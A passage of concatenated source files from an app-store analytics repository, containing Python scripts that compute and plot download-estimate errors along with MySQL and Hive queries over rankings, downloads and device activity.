#loginv_sbe_df.rename(columns={'loginv_estimate':'loginv_sbe_estimate'}, inplace=True)
#del loginv_sbe_df['actual']
#loginv_sbe_df = loginv_sbe_df.merge(actuals_df, on=['store_id', 'date', 'feed_id', 'app_id'])
#loginv_sbe_df['loginv_sbe_abs_error'] = (loginv_sbe_df['loginv_sbe_estimate'] - loginv_sbe_df['actual']).abs()
#loginv_sbe_df['loginv_sbe_rel_error'] = loginv_sbe_df['loginv_sbe_abs_error'] / loginv_sbe_df['actual']
#df = df[df['date']==df['date'].min()]
#loginv_scored_sbe_df = df.drop_duplicates(cols=['store_id', 'date', 'category_id', 'feed_id', 'app_id'])
df = df.merge(scores, on=['store_id', 'feed_id', 'category_id', 'date'], how = 'left')
df['tae_scored'] = df['tae'] * df['cg_score']
loginv_scored_sbe_df = df.groupby(['store_id', 'date', 'feed_id', 'app_id']).sum().reset_index()
loginv_scored_sbe_df['tae_scored'] /= loginv_scored_sbe_df['cg_score']
#loginv_scored_sbe_df.drop_duplicates(cols=['store_id', 'date', 'feed_id', 'app_id'], inplace=True)
#loginv_scored_sbe_df.rename(columns={'loginv_scored_estimate':'loginv_scored_sbe_estimate'}, inplace=True)
#del loginv_scored_sbe_df['actual']
#loginv_scored_sbe_df = loginv_scored_sbe_df.merge(actuals_df, on=['store_id', 'date', 'feed_id', 'app_id'])
#loginv_scored_sbe_df['loginv_scored_sbe_abs_error'] = (loginv_scored_sbe_df['loginv_scored_sbe_estimate'] - loginv_scored_sbe_df['actual']).abs()
#loginv_scored_sbe_df['loginv_scored_sbe_rel_error'] = loginv_scored_sbe_df['loginv_scored_sbe_abs_error'] / loginv_scored_sbe_df['actual']
loginv_scored_sbe_df = loginv_scored_sbe_df[['store_id', 'date', 'feed_id', 'app_id', 'tae_scored']]
gres_final = pd.merge(gres_final, loginv_scored_sbe_df, on=['store_id', 'date', 'feed_id', 'app_id'], how = 'left')
gres_final['sbe_rel_error'] = (gres_final['Daily.Estimate'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final['tae_rel_error'] = (gres_final['tae'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final['tae_scored_rel_error'] = (gres_final['tae_scored'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final.drop_duplicates(cols=['store_id', 'date', 'feed_id', 'app_id'], inplace=True)
gres_final.to_csv('res_%s_%s_%s.csv'%(store_id, store_name, ver),index=False, quoting = csv.QUOTE_NONNUMERIC)
return gres_final
def plot_rank_error(df):
df = df.merge(df, on=['Store', 'Day', 'App.ID'], how='left')
df = df[df['Category_x'] ==36]
#gres_iphone = gres[(gres['Rank_x_x'] > 0) & (gres['sbe_rel_error'] < 5) & (gres['new_rel_error'] < 5)]
gres_iphone = df[(df['Rank_x_x'] > 0) & (df) & (df['t12e_rel_error'] < 5)]
gres_iphone = gres_iphone.sort('Rank_x_x', ascending=True)
for n, g in gres_iphone.groupby(['Day']):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(g['Rank_x_x'], g['sbe_rel_error'] * 100.0, c = 'r', label='SBE')
ax.scatter(g['Rank_x_x'], g['t12e_rel_error'] * 100.0, c = 'g', label='Auto-Segmted SBE')
ax.legend(loc='best')
title = 'Relative Error iPhone Grossing Overall July%s'%str(int(float(n)))
plt.title(title)
plt.xlim(0, 1000)
plt.ylabel('Relative Error %')
plt.xlabel('Rank')
plt.grid()
fig.savefig('Relative Error Plots/%s.png'%title)
print title
plt.close()
gres_ipad = gres[(gres['Rank_y_x'] > 0) & (gres['sbe_rel_error'] < 5) & (gres['t12e_rel_error'] < 5)]
gres_ipad = gres_ipad.sort('Rank_y_x', ascending=True)
for n, g in gres_ipad.groupby(['Day']):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(g['Rank_y_x'], g['sbe_rel_error'] * 100.0, c = 'r', label='SBE')
ax.scatter(g['Rank_y_x'], g['t12e_rel_error'] * 100.0, c = 'g', label='Auto-Segmted SBE')
ax.legend(loc='best')
title = 'Relative Error iPad Grossing Overall July%s'%str(int(float(n)))
plt.title(title)
plt.xlim(0, 400)
plt.ylabel('Relative Error %')
plt.xlabel('Rank')
plt.grid()
fig.savefig('Relative Error Plots/%s.png'%title)
print title
plt.close()
def plot_8020(df):
for n, g in df.groupby(['feed_id', 'date']):
date = str(n[1])
feed = int(float(n[0]))
fig = plt.figure()
g = g.sort('actual', ascending=False)
ax = fig.add_subplot(111)
g = g.sort('sbe_rel_error', ascending=True)
p0, = ax.plot(g['sbe_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'r-', label='SBE')
g = g.sort('tae_rel_error', ascending=True)
p2, = ax.plot(g['tae_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'b-', label='LogInv')
g = g.sort('tae_scored_rel_error', ascending=True)
p1, = ax.plot(g['tae_scored_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'g-', label='LogInv Scored')
ax.legend(loc=4)
if (feed == 0):
title = '80-20_%s_%s_%s_Free_All_Apps'%(store_id, store_name, date)
if (feed == 1):
title = '80-20_%s_%s_%s_Paid_All_Apps'%(store_id, store_name, date)
if (feed == 2):
title = '80-20_%s_%s_%s_Grossing_All_Apps'%(store_id, store_name, date)
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('% of Apps')
plt.xlabel('Relative Error')
plt.grid()
print title
fig.savefig('%s/%s.png'%(plot_dir, title))
plt.close()
fig = plt.figure()
g = g.sort('actual', ascending=False)
g = g[:200]
ax = fig.add_subplot(111)
g = g.sort('sbe_rel_error', ascending=True)
p0, = ax.plot(g['sbe_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'r-', label='SBE')
g = g.sort('tae_rel_error', ascending=True)
p2, = ax.plot(g['tae_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'b-', label='LogInv')
g = g.sort('tae_scored_rel_error', ascending=True)
p1, = ax.plot(g['tae_scored_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'g-', label='LogInv Scored')
ax.legend(loc=4)
if (feed == 0):
title = '80-20_%s_%s_%s_Free_Top200_Apps'%(store_id, store_name, date)
if (feed == 1):
title = '80-20_%s_%s_%s_Paid_Top200_Apps'%(store_id, store_name, date)
if (feed == 2):
title = '80-20_%s_%s_%s_Grossing_Top200_Apps'%(store_id, store_name, date)
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('% of Apps')
plt.xlabel('Relative Error')
plt.grid()
print title
fig.savefig('%s/%s.png'%(plot_dir, title))
plt.close()
def plot_act_err(df):
for n, g in df.groupby(['feed_id', 'date']):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(g['actual'], g['actual'], color='black', label='Actual')
ax.plot(g['actual'], (g['Daily.Estimate']), 'r.', alpha=0.4, label='SBE')
ax.plot(g['actual'], (g['tae']), 'b.', alpha=0.4, label='LogInv Univ')
ax.legend(loc='best')
title = 'ActEst_%s_%s_%s_%s'%(store_id, store_name, str(int(float(n[0]))), str(n[1]) )
plt.title(title)
plt.ylabel('Estimates')
plt.xlabel('Actual')
plt.grid()
ax.set_yscale('log')
ax.set_xscale('log')
#fig.savefig('%s.png'%title)
fig.savefig('%s/%s.png'%(plot_dir, title))
print title
#plt.close()
def main():
#global df_obs
#global df_final
global store_id
global store_name
global ver
global plot_dir
data_dir = '/Users/antony/workspace/data/benchmark_android'
#data_dir = '/home/antony/data/benchmark_ios'
ver = 'v2'
plot_dir = 'Plots_%s'%ver
start_date = '2013-07-21'
end_date = '2013-07-27'
filelist= []
store_ids = set()
for root, dirs, files in os.walk(data_dir):
for file in files:
#if file.endswith(".csv.bz2") and '143441' in file:
if file.endswith(".csv.bz2"):
filepath = os.path.join(root, file)
filelist.append(file)
store_ids.add(file.split('_')[2])
#store_ids.clear()
#store_ids.add('1')
for i in sorted(list(store_ids)):
#if int(i) < 12:
# continue
store_id = i
store_name = config.ANDROID_STORES_DICT[int(store_id)]
store_id_str = '_'+i+'_'
print '======== country',store_id, store_name
sdf = []
for file in files:
if file.endswith(".csv.bz2") and store_id_str in file:
filepath = os.path.join(root, file)
print filepath
dfbz = bz2.BZ2File(filepath, 'r')
pdf = pd.read_csv(dfbz)
sdf.append(pdf)
sdf = pd.concat(sdf)
df_obs = preprocess_metadata(sdf)
del sdf
df_reg = regression(df_obs, start_date, end_date)
del df_obs
if(df_reg.shape[0]==0):
continue
#df_final = gene_final(df_reg)
df_final = gene_final_byscore(df_reg)
del df_reg
df_plot = df_final.dropna(subset = ['actual'])
del df_final
# the following code build the overall_rank-error curve
if False:
plot_rank_error(df_plot)
# the following code build the 80-20 curve
if True:
plot_8020(df_plot)
# the following code build the Actual-Error curve
if True:
plot_act_err(df_plot)
del df_plot
print '======== Done',store_id
pass
if __name__ == '__main__':
main()<file_sep>/evaluation/py/get_daily_quality.py
# Author: <NAME> <<EMAIL>>
import os
import sys
import pandas as pd
import numpy as np
def main():
input_dir = sys.argv[1]
output_dir = sys.argv[2]
for f in filter(lambda s: s.endswith('.csv'), os.listdir(input_dir)):
full_path = os.path.join(input_dir, f)
df = pd.read_csv(full_path)
daily_quality = _get_daily_sbe_error(df)
daily_quality.rename(columns={'mean': 'daily_sbe_error_mean',
'median': 'daily_sbe_error_median'},
inplace=True)
daily_quality.to_csv(os.path.join(output_dir, f), index=False)
def _get_daily_sbe_error(df):
def daily_over20_error(x):
return np.sum(x > 0.2) / float(len(x))
df['daily_sbe_error'] = (df['estimate'] - df['units']).abs() / df['units'].astype(float)
grouped = df.groupby('app_id')['daily_sbe_error'].aggregate([pd.Series.mean, daily_over20_error])
return grouped.reset_index()
if __name__ == '__main__':
main()
<file_sep>/aa_au_model/hive_scripts/workflow/module/loop_generators.py
# Copyright (c) 2015 App Annie Inc. All rights reserved.
import re
from datetime import datetime, timedelta, date
class LoopGenerator(object):
def __init__(self, *args, **kwargs):
pass
def generate(self, **kwargs):
raise NotImplementedError
class NumberLoopGenerator(LoopGenerator):
def __init__(self, init, end, step, formatting=None, **kwargs):
try:
self._init = float(init)
except ValueError:
raise Exception('Initial value should be a number, not {} ({}).'
.format(init, type(init)))
try:
self._end = float(end)
except ValueError:
raise Exception('End value should be a number, not {} ({}).'
.format(end, type(end)))
try:
self._step = float(step)
except ValueError:
raise Exception('Step value should be a number, not {} ({}).'
.format(step, type(step)))
if step == 0:
raise Exception(
'Loop step cannot be 0, 0 will make an infinite looping.')
if (step > 0 and init > end) or (step < 0 and init < end):
raise Exception((
'Loop initial value adding step will never reach the end value,'
' check it.'))
self._format = formatting
def generate(self, **kwargs):
value = self._init
while (self._step > 0 and value <= self._end) \
or (self._step < 0 and value >= self._end):
yield str(value) if self._format is None \
else ('%' + self._format) % value
value += self._step
class TimeLoopGenerator(LoopGenerator):
@staticmethod
def _to_datetime(time):
match_time = re.search(
'(\d{4})(-\d{2})?(-\d{2})?( \d{2})?(:\d{2})?(:\d{2})?(\.\d{1,6})?',
time)
if match_time is None:
raise Exception(
'Time should be in format: YYYY-mm-dd HH:MM:SS.ssssss, not %s.'
% time)
time_list = [int(t.strip(' -:.')) for t in match_time.groups()
if t is not None]
return datetime(*time_list)
def __init__(self, init, end, step, **kwargs):
self._init_time = TimeLoopGenerator._to_datetime(init)
self._end_time = TimeLoopGenerator._to_datetime(end)
self._step, self._step_is_negative, self._time_dim = \
self._parse_step(step)
if (not self._step_is_negative and self._init_time > self._end_time) or\
(self._step_is_negative and self._init_time < self._end_time):
raise Exception((
'Loop initial time adding step time will never reach the end '
'time, check it.'))
def _parse_step(self, step):
if re.search('^-?\d+[Y|m|d|H|M|S|f]$', step) is None:
raise Exception((
'Time step should be in format: [num][Y|m|d|H|M|S|f], '
'like -2d is minus 2 days.'))
step_num = int(step[:-1])
if step_num == 0:
raise Exception(
'Loop step cannot be 0, 0 will make an infinite looping.')
if step.endswith('Y'):
return {'days': step_num * 365}, step.startswith('-'), 'Y'
elif step.endswith('m'):
return {'days': step_num * 30}, step.startswith('-'), 'm'
elif step.endswith('d'):
return {'days': step_num}, step.startswith('-'), 'd'
elif step.endswith('H'):
return {'seconds': step_num * 3600}, step.startswith('-'), 'H'
elif step.endswith('M'):
return {'seconds': step_num * 60}, step.startswith('-'), 'M'
elif step.endswith('S'):
return {'seconds': step_num}, step.startswith('-'), 'S'
else:
return {'microseconds': step_num}, step.startswith('-'), 'f'
def generate(self, **kwargs):
time = self._init_time
while (not self._step_is_negative and time <= self._end_time) or \
(self._step_is_negative and time >= self._end_time):
if self._time_dim == 'Y':
output = time.strftime('%Y')
elif self._time_dim == 'm':
output = time.strftime('%Y-%m')
elif self._time_dim == 'd':
output = time.strftime('%Y-%m-%d')
elif self._time_dim == 'H':
output = time.strftime('%Y-%m-%d %H')
elif self._time_dim == 'M':
output = time.strftime('%Y-%m-%d %H:%M')
elif self._time_dim == 'S':
output = time.strftime('%Y-%m-%d %H:%M:%S')
else:
output = time.strftime('%Y-%m-%d %H:%M:%S.%f')
time += timedelta(**self._step)
yield output
class EnumLoopGenerator(LoopGenerator):
def __init__(self, values, **kwargs):
if isinstance(values, list) or isinstance(values, tuple):
self._values = values
else:
raise Exception(
'Loop enum values should be a list or a tuple, not %s (%s).'
% (values, type(values)))
def generate(self, **kwargs):
for val in self._values:
yield val
class CustomizedHourlyETLLoopGenerator(LoopGenerator):
def __init__(self, init, end, step, **kwargs):
try:
self._init = int(init)
except ValueError:
raise Exception('Initial value should be an integer, not {} ({}).'
.format(init, type(init)))
try:
self._end = int(end)
except ValueError:
raise Exception('End value should be an integer, not {} ({}).'
.format(end, type(end)))
try:
self._step = int(step)
except ValueError:
raise Exception('Step value should be an integer, not {} ({}).'
.format(step, type(step)))
if step == 0:
raise Exception(
'Loop step cannot be 0, 0 will make an infinite looping.')
if (step > 0 and init > end) or (step < 0 and init < end):
raise Exception((
'Loop initial value adding step will never reach the end value,'
' check it.'))
def generate(self, **kwargs):
value = self._init
while (self._step > 0 and value <= self._end) or \
(self._step < 0 and value >= self._end):
yield '%02d' % value, 'etl_%02d' % value
value += self._step
class MultiEnumLoopGenerator(LoopGenerator):
def __init__(self, values, variable_num, **kwargs):
if isinstance(values, list) or isinstance(values, tuple):
self._values = values
else:
raise Exception(
'Loop enum values should be a list or a tuple, not %s (%s).'
% (values, type(values)))
if isinstance(variable_num, int):
self._var_num = variable_num
if variable_num <= 1:
raise Exception('Variable number must be greater than 1.')
else:
raise Exception('Variable number must be an integer.')
def generate(self, **kwargs):
for val in self._values:
yield (val,) * self._var_num
class DatePairLoopGenerator(LoopGenerator):
def __init__(self, start_date, end_date, delta, **kwargs):
try:
self.start_date = date(*map(int, start_date.split('-')))
self.end_date = date(*map(int, end_date.split('-')))
except:
raise Exception('Please check the format of start date and end date, should be YYYY-mm-dd')
try:
self.delta = int(delta)
except ValueError:
raise Exception('Delta value should be an integer, not {} ({}).'.format(delta, type(delta)))
def generate(self, **kwargs):
ct = self.start_date
while ct <= self.end_date:
yield str(ct), str(ct + timedelta(days=self.delta))
ct += timedelta(days=1)
<file_sep>/kaggle/evaluate.py
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
def get_stats(df):
result = []
ranges = [[1,20],
[21,200],
[201,10000]
]
for n,g in df.groupby(['feed', 'date']):
g = g.sort(['actual'], ascending=False)
for range in ranges:
t = g[range[0]:range[1]].mean()
top = pd.DataFrame(columns=t.index.values)
top = top.append(t, ignore_index=True)
top['range'] = str(range)
result.append(top)
result = pd.concat(result)
result.to_csv('data/stats.csv', index=False)
return result
def process_file(df):
columns = df.columns.values
if 'ta' in columns:
df['actual'] = df['ta']
df['kaggle_estimate'] = df['ta_pred']
elif 'tb' in columns:
df['actual'] = df['tb']
df['kaggle_estimate'] = df['tb_pred']
df['kaggle_diff'] = (df['actual'] - df['kaggle_estimate']).abs()
df['kaggle_rel_diff'] = df['kaggle_diff'] / df['actual']
df['our_diff'] = (df['actual'] - df['our_estimate']).abs()
df['our_rel_diff'] = df['our_diff'] / df['actual']
df = df.dropna()
get_stats(df)
plot_actuals(df)
plot_80_20(df)
def preprocess_ours(df):
df.rename(columns={'a':'app'}, inplace=True)
df = df.groupby(['app', 'date']).mean().reset_index()
df = df.fillna(0)
df['our_estimate'] = df['t1e'] + df['t2e']
#df = df[['app', 'date', 'our_estimate']]
return df
def plot_actuals(df):
########### Plor actuals VS Estimates ################
for n,g in df.groupby(['feed', 'date']):
fig = plt.figure()
ax = fig.add_subplot(111)
p1, = ax.plot(g['actual'], g['kaggle_estimate'], 'b.', alpha=0.4, label='Kaggle estimate')
p1, = ax.plot(g['actual'], g['our_estimate'], 'g.', alpha=0.4, label='Our estimate')
p1, = ax.plot(g['actual'], g['actual'], 'r-', label='Actual')
ax.legend(loc='best', prop={'size':10})
title = 'difference_%s'%str(n)
plt.title(title)
plt.xlabel('Actual')
plt.ylabel('Estimate')
ax.set_yscale('log')
ax.set_xscale('log')
plt.grid()
fig.savefig('data/plots_3/%s.png'%title)
def plot_80_20(df):
########### Plot 80-20 curves ################
for n,g in df.groupby(['feed', 'date']):
fig = plt.figure()
g = g.sort('actual', ascending=False)
g = g[:200]
ax = fig.add_subplot(111)
y_values = (np.arange(g.shape[0])*1.0/g.shape[0])*100.0
g = g.sort('kaggle_rel_diff', ascending=True)
p1, = ax.plot(g['kaggle_rel_diff'], y_values, 'b-', linewidth=2.0, alpha=0.4, label='Kaggle estimate')
g = g.sort('our_rel_diff', ascending=True)
p1, = ax.plot(g['our_rel_diff'], y_values, 'g-', linewidth=2.0, alpha=0.4, label='Our estimate')
ax.legend(loc='best', prop={'size':10})
title = '80-20_%s'%str(n)
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('%')
plt.xlabel('Relative Error')
plt.grid()
fig.savefig('data/plots_3/%s.png'%title)
def main():
dir = '/Users/perezrafael/appannie/data/kaggle_predictions_3'
kaggle_file = 'ios_data_4b9941c6-6751-443a-ac7f-78fabbe96404_ta_rank.csv'
our_file = 'data_4b9941c6-6751-443a-ac7f-78fabbe96404_results.csv'
kaggle_file = '%s/%s'%(dir, kaggle_file)
our_file = '%s/%s'%(dir, our_file)
kaggle_df = pd.read_csv(kaggle_file)
our_df = preprocess_ours(pd.read_csv(our_file))
our_df = our_df.merge(kaggle_df, on=['app', 'date'])
process_file(our_df)
if __name__ == '__main__':
main()<file_sep>/int-vs-m-benchmark/sql/ios/1000c1-prepare_rankings.sql
/*
Get the rankings used by the m1000 algorithm.
*/
-- Get the used ranking sources.
DROP TEMPORARY TABLE IF EXISTS temp.used_rankings;
CREATE TEMPORARY TABLE temp.used_rankings(
`date` date NOT NULL,
`appstore_instance_id` smallint(5) unsigned NOT NULL,
`rankcategory_id` smallint(5) unsigned NOT NULL,
`ranking_source` enum('rankings_corrected','rankings_rss','rankings_normal','rankings_hourly') NOT NULL,
`ranking_date` date NOT NULL,
`ranking_time` time DEFAULT NULL,
`created` datetime(3) NOT NULL,
PRIMARY KEY (`date`,`appstore_instance_id`,`rankcategory_id`,`created`),
UNIQUE KEY `select_ranking` (`ranking_date`,`appstore_instance_id`,`rankcategory_id`,`ranking_time`) )
SELECT
r.*
FROM
estimates.used_rankings_appstore r
JOIN temp.settings_day_weights w
ON DATE_ADD(w.date, INTERVAL 1 DAY) = r.date
JOIN temp.settings_appstore_instances sai
USING (appstore_instance_id)
JOIN temp.settings_rankcategories src
USING (rankcategory_id);
-- Get ranks from the hourly ranks table.
DROP TEMPORARY TABLE IF EXISTS temp.rankings;
CREATE TEMPORARY TABLE temp.rankings(
date date NOT NULL,
device_id TINYINT unsigned NOT NULL,
country_id smallint(5) unsigned NOT NULL,
type ENUM('paid','gross','free') NOT NULL,
category_id smallint(5) unsigned NOT NULL,
`rank` SMALLINT(5) UNSIGNED NOT NULL,
`application_id` INT(10) UNSIGNED NOT NULL,
`price_usd` DECIMAL(9,2) NOT NULL,
ranking_source ENUM('rankings_corrected', 'rankings_rss','rankings_normal','rankings_hourly'),
ranking_date date NOT NULL,
ranking_time time DEFAULT NULL,
CONSTRAINT PRIMARY KEY (date, device_id,country_id,type,category_id,rank),
INDEX i (date, device_id,country_id,type,application_id) )
select
DATE_SUB(ur.date, interval 1 day) as date,
ai.country_id,
ai.device_id,
rc.type,
rc.category_id,
rh.rank,
rh.application_id,
ROUND(IF(rh.price is null, 0, rh.price / ser.rate),2) AS price_usd,
ur.ranking_source,
ur.ranking_date,
ur.ranking_time
from
temp.used_rankings ur
join appstore.rankings_hourly rh
on ur.ranking_date = rh.date
and ur.appstore_instance_id = rh.appstore_instance_id
and ur.rankcategory_id = rh.rankcategory_id
and ur.ranking_time = rh.time
join appstore.appstore_instances ai
on rh.appstore_instance_id = ai.id
join appstore.rankcategories rc
on rh.rankcategory_id = rc.id
left JOIN temp.settings_exchange_rates ser
ON ser.id = rh.currency_id
where
ur.ranking_source = 'rankings_hourly' ;
;
-- Get ranks from the rankings corrected table.
insert into
temp.rankings
select
DATE_SUB(ur.date, interval 1 day) as date,
ai.country_id,
ai.device_id,
rc.type,
rc.category_id,
r.rank,
r.application_id,
ROUND(IF(r.price is null, 0, r.price / ser.rate),2) AS price_usd,
ur.ranking_source,
ur.ranking_date,
null as ranking_time
from
temp.used_rankings ur
join appstore.rankings_corrected r
on ur.ranking_date = r.date
and ur.appstore_instance_id = r.appstore_instance_id
and ur.rankcategory_id = r.rankcategory_id
join appstore.appstore_instances ai
on r.appstore_instance_id = ai.id
join appstore.rankcategories rc
on r.rankcategory_id = rc.id
left JOIN temp.settings_exchange_rates ser
ON ser.id = r.currency_id
where
ur.ranking_source = 'rankings_corrected' ;
-- Get ranks from RSS rankings table.
insert into
temp.rankings
select
DATE_SUB(ur.date, interval 1 day) as date,
ai.country_id,
ai.device_id,
rc.type,
rc.category_id,
r.rank,
r.application_id,
ROUND(IF(r.price is null, 0, r.price / ser.rate),2) AS price_usd,
ur.ranking_source,
ur.ranking_date,
null as ranking_time
from
temp.used_rankings ur
join appstore.rankings r
on ur.ranking_date = r.date
and ur.appstore_instance_id = r.appstore_instance_id
and ur.rankcategory_id = r.rankcategory_id
join appstore.appstore_instances ai
on r.appstore_instance_id = ai.id
join appstore.rankcategories rc
on r.rankcategory_id = rc.id
left JOIN temp.settings_exchange_rates ser
ON ser.id = r.currency_id
where
(ur.ranking_source = 'rankings_rss' or ur.ranking_source = 'rankings_normal');
<file_sep>/icon-matching-framework/README.md
icon-matching-framework
=======================
This directory contains the poc for the icon mathchin framework.<file_sep>/ranking_change/analyse_correlation.py
'''
Created on Sep 10, 2013
@author: perezrafael
'''
import pandas as pd
file = '/Users/perezrafael/appannie/data/corr-results-1378781934.9.csv'
def main():
df = pd.read_csv(file)
df = df[df['rank_transform_name'] =='log']
df = df[df['value_transform_name'] =='log']
return df
if __name__ == '__main__':
df = main()<file_sep>/old_investigations/internal/concat_by_month.py
"""
For aggregate the raw data that Mark's script provides.
For Mark's script, the parameters and output are:
- Parameters:
-s[store] -f[feed] -d[date]
- Output example:
category_id,rank,app_id,estimate
36,1,432849519,25006
36,2,419396407,23158
36,3,343200656,22141
Mark's script is query on the daily basis, this script will wrap Mark's script
to provide on the monthly basis, and generate file with complete fields and
normalized filename.
"""
#Author: <NAME> <<EMAIL>>
from optparse import OptionParser
import monthly_concater
def parse_options():
parser = OptionParser()
parser.add_option("-s", "--store", dest="store",
help="The single store that you want to calculate, separated by comma. e.g. 143441")
parser.add_option("-m", "--month", dest="year_month",
help="A single month (e.g. 2012-09).")
parser.add_option("-u", "--unitstype", dest="units_type",
help="A single type of units to inspect, e.g. Downloads")
parser.add_option("-n", "--njobs", dest="n_jobs",
help="The number of processes for parallizing")
parser.add_option("-x", "--overwrite", action="store_true", dest="overwrite",
help="Whether to overwrite the exisitng caches.")
(opts, args) = parser.parse_args()
return refine_options(opts)
def refine_options(opts):
opts.n_jobs = int(opts.n_jobs)
return opts
if __name__ == '__main__':
options = parse_options()
print(options)
# Concat all the daily data related to the current store and month.
monthly_concater.concat_and_save_all_days_and_feeds_in_month(options,
n_jobs=options.n_jobs)
<file_sep>/evaluation/py/webui_from_weekly.py
'''
Created on Jul 10, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
import os
import psycopg2
from pandas.io import sql
from datetime import datetime
unit_type_dict = {0:0,
1:0,
2:1,
100:0,
101:0,
102:1}
def append_weekdays(df):
''' Check each weekday for each date and append it
'''
dates = df[['date']].drop_duplicates()
if isinstance(dates['date'][:1][0], str):
dates['date_b'] = dates['date'].apply(lambda x: datetime.strptime(x, '%Y-%m-%d'))
dates['weekday'] = dates['date_b'].apply(lambda x: x.weekday())
dates = dates.drop('date_b', axis=1)
else:
dates['weekday'] = dates['date'].apply(lambda x: x.weekday())
df = df.merge(dates, on='date')
return df
if __name__ == '__main__':
device = 'ios'
month = '2013-05'
model = 'final'
in_dir = '/Users/perezrafael/appannie/data_science/evaluation/data/%s_weekly/%s/est_daily_raw'%(device, month)
out_dir = '/Users/perezrafael/appannie/data_science/evaluation/data/%s_webui_%s/%s/est_daily_raw'%(device, model, month)
if device=='ios':
dbname = 'aa_est_weekly'
elif device=='android':
dbname = 'aa_est_android_weekly'
conn = psycopg2.connect('dbname=%s user=aa host=nile'%dbname)
if not os.path.exists(out_dir):
os.makedirs(out_dir)
for (dirpath, dirnames, filenames) in os.walk(in_dir):
for filename in filenames:
if filename.endswith('.csv'):
metadata = filename.split('_')
store_id = metadata[0]
feed_id = int(metadata[1])
filepath = os.sep.join([dirpath, filename])
df = pd.read_csv(filepath)
start_date = df['date'].min()
end_date = df['date'].max()
if model=='final':
query = "select to_char(date, 'YYYY-MM-DD') as date, weight from est_weight where store_id=%s and unit_type=%s and date>='%s' and date<='%s';"%(store_id, unit_type_dict[feed_id], start_date, end_date)
weights_df = sql.frame_query(query, con=conn)
df = df.merge(weights_df, on='date')
elif model=='preview':
query = "select weekday, weight from est_weight_preview where store_id=%s and unit_type=%s;"%(store_id, unit_type_dict[feed_id])
weights_df = sql.frame_query(query, con=conn)
df = append_weekdays(df)
df = df.merge(weights_df, on='weekday')
df = df.drop('weekday', axis=1)
print query
df['webui_estimate'] = df['estimate']*df['weight']
df = df.drop(['estimate', 'weight'], axis=1)
df.rename(columns={'webui_estimate':'estimate'}, inplace=True)
df.to_csv('%s/%s'%(out_dir,filename), index=False)
<file_sep>/int-vs-m-benchmark/android-install-vs-downloads/sql/get_ranking_and_download_data.sql
set @begin_date = 20140601;
set @end_date = 20140610;
set @max_date_difference = 9;
#set @type = 'free';
#set @countries = 'NL,DE,FR';
#set @type = 'paid';
#set @countries = 'JP,NL,FR';
drop temporary table if exists temp.rankings;
create temporary table temp.rankings (
constraint primary key(
appstore_instance_id,
application_id,
date
))
select
r.date,
r.appstore_instance_id,
cn.iso_code,
rc.type,
r.rank,
r.application_id,
a.name
from
market.rankings r
join (
select
distinct date
from
market.rankings
where
date between @begin_date and @end_date
) x
using(date)
join market.appstore_instances ai
on r.appstore_instance_id = ai.id
join market.countries cn
on ai.country_id = cn.id
join market.rankcategories rc
on r.rankcategory_id = rc.id
join market.categories cg
on rc.category_id = cg.id
join market.applications a
on r.application_id = a.id
where
find_in_set(cn.iso_code, @countries)
and rc.type = @type
and cg.name = 'Top Overall'
;
drop temporary table if exists temp.data;
create temporary table temp.data (
constraint primary key(
appstore_instance_id,
application_id,
date
))
select
date,
appstore_instance_id,
application_id,
max(if(down.type = 'download_device', down.delta, null)) as device,
max(if(down.type = 'download', down.delta, null)) user,
max(down.customer_price) as customer_price
from
market.downloads down
join (
select
distinct date
from
market.rankings
where
date between date_sub(@begin_date, interval @max_date_difference day) and @end_date
) x
using(date)
join (
select
appstore_instance_id,
application_id
from
temp.rankings
group by
appstore_instance_id,
application_id
) x2
using(appstore_instance_id, application_id)
where
down.type in ('download_device', 'download')
group by
date,
appstore_instance_id,
application_id
;
select
r.*,
d.date as download_date,
d.device,
d.user,
d.customer_price,
datediff(r.date, d.date) as d_minus
from
temp.rankings r
join temp.data d
using(appstore_instance_id, application_id)
where
datediff(r.date, d.date) > 0
and datediff(r.date, d.date) <= @max_date_difference
;
<file_sep>/aa_au_model/hive_ql/export_device_bundle_ids.sql
set hive.auto.convert.join=false;
set hive.cli.print.header = false;
set hive.exec.dynamic.partition = true;
set hive.exec.dynamic.partition.mode = nonstrict;
-- Determine active devices in each week/month for later filtering
drop table if exists period_active_weekly;
create table period_active_weekly (
end_period_date string,
device_id string
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/active-weekly'
;
insert overwrite table period_active_weekly
select
x.datestr as end_period_date,
x.device_id
from (
select
active.datestr,
active.device_id,
cast(count(distinct(active.date)) as int) as n_active
from
usage_model_selected_device_timezone_weekly active
group by
active.datestr,
active.device_id
having
cast(count(distinct(active.date)) as int) = 7
) x
;
drop table period_active_monthly;
create table period_active_monthly (
end_period_date string,
device_id string
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/active-monthly'
;
insert overwrite table period_active_monthly
select
x.datestr as end_period_date,
x.device_id
from (
select
active.datestr,
active.device_id,
cast(count(distinct(active.date)) as int) as n_active
from
usage_model_selected_device_timezone_monthly active
group by
active.datestr,
active.device_id
having
cast(count(distinct(active.date)) as int) = day(active.datestr)
) x
;
-- Get unique iOS devices
drop table if exists ios_devices;
create table ios_devices
as
select
device_id
from
vpn_new_device_info_us
where
platform = 'iOS'
and (type = 'Tablet' or type = 'Smartphone')
group by
device_id
;
--
drop table if exists app_sessions_per_device;
create table app_sessions_per_device
as
select
session.datestr,
session.device_id,
session.bundleid,
max(session.end_period_date) as weekly_end_period_date
from
(
select
